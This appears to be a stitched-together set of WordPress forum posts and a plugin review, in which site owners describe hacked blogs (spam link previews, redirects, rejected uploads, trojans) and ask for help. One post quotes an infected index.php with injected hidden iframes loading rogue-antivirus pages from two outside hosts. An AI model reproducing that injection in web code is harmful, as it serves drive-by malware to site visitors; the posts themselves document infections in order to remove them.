My site got infected and I would be LOST without this fantastic plugin. It is without a doubt the best value for any plugin on WordPress. Without security, what good is your website? It’s just a matter of time before it gets hacked, because WordPress is so ubiquitous on the internet, and hackers sit and study the themes and plugins that most everyone uses and they find vulnerabilities to exploit. So being the best platform has its drawbacks.

But instead of paying for expensive subscription plans on WordFence or Swift or Securi, this plugin finds and fixes files that have malware injections automatically! And for a very reasonable one-time payment, you can have the plugin protect and restore every single file in your WordPress installation – FOREVER! I LOVE it! Five stars all day long.

Great work Eli! (it takes a Yiddishe Kop)

Security Alert
The file you are uploading was rejected by the server.
It probably contents viruses or trojans that can damage your website

Do not attempt to upload it again as your IP address may be blocked.

Aside from the poor grammar (i.e., “It probably contents”), the files I uploaded were and are clean files. I scanned them with my own antivirus, plus used the scans at this site: https://www.virustotal.com/en/

In both cases the file was perfectly clean. Yet, for some reason the server says they are not. One file, maybe. Two files? Unlikely. So I tried five more files that I know (and verified) as being clean. The server said those five were each contaminated. I doubt all seven files are corrupt when scans show all seven are clean.

URL: www.johnrothra.com

The link previews on Facebook and incoming links all show SPAM content – prescription drugs and the like. The blog entries, on the other hand, are the same as they ever were. I have tried turning off all my plug ins, and activating new themes, with no luck – the same thing happens.

I have no idea how to track down just what’s going on, or how to correct it, and I can’t any links or articles describing a similar occurrence on other blogs.

Here’s the site: https://www.frenchbulldogz.org

Here’s a link to a screen cap of what happens when you link to any of the blog entries on this site from Facebook:

https://www.frenchbulldogz.net/wp-content/uploads/2012/02/spam-links-on-facebook.jpg

And here’s my incoming links list, showing the spam headings:

https://www.frenchbulldogz.net/wp-content/uploads/2012/02/spam-incoming-links.jpg

Can anyone help, or suggest how I can correct this?

So I’ve tried working with my host provider to find the cause of why my site is being redirected. I updated to an earlier date when I know I was not having any issues like this. It has not worked. Everytime I log in to my dashboard I’m being bounced right out. I can’t click on anything within the menus. This is really frustrating. I know I have an option of uploading my backup, but there is so much content that I will lose. I’m generating content, and my backup goes up to July 21st. I need some help, and future guidance on how to protect my site in the future.

They seem to get in at will, not only WP, but html index pages seem to be no problem. The objective is to download XP AntiSpyware 2009, a variation on the AntiSpyware XP 2008 rogue a couple of months ago.

This is how index.php is changed, I have bolded the added code:

<?php
/* Short and sweet */
define(‘WP_USE_THEMES’, true);
require(‘./wp-blog-header.php’);
?<html><body><iframe src=”https://thefilmmusic.cn/in” width=1 height=1 style=”visibility: hidden”></iframe><iframe src=”https://xmanages.cn/in” width=1 height=1 style=”visibility: hidden”></iframe></body></html>>

The permissions on this were set to 644; owner read/write, others read only. How can I stop this happening because although I have the tools to remove this trojan visitors to my sites may not.

www2.skiforeningen.no

(Please do not try unless your PC is properly proteced by virus protection!)

But refer for instance to the diagnostics given by Google safebrowsing:

https://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=https://www2.skiforeningen.no/

An HTTP connection to 61.155.8.157 is opened by the browser, and my problem is that I can not find out where this happens.

Here is what I did upgrading from 2.4 to 2.6:

First – following upgrade suggestions and deleted wp-admin and wp-includes, unzipped the fresh code but kept the wp-content with themes and plugins. As the trojan was still there afterwards, I also tried to delete wp-content and replaced it with wp-content from the tar file. The trojan is still here.

I have tried to search the entire wordpress directory structure for the text “61.155.8.157”, but no results.

Any tips will be appreciated helping me to get rid of the trojan. Maybe someone has been struck by this trojan previously?

Next I got some iframe problem. Gave me two different trojans.

I have removed the whole blog…

I did have catcha or whatever it’s called on the site.

Just wanted someone to know about this problem.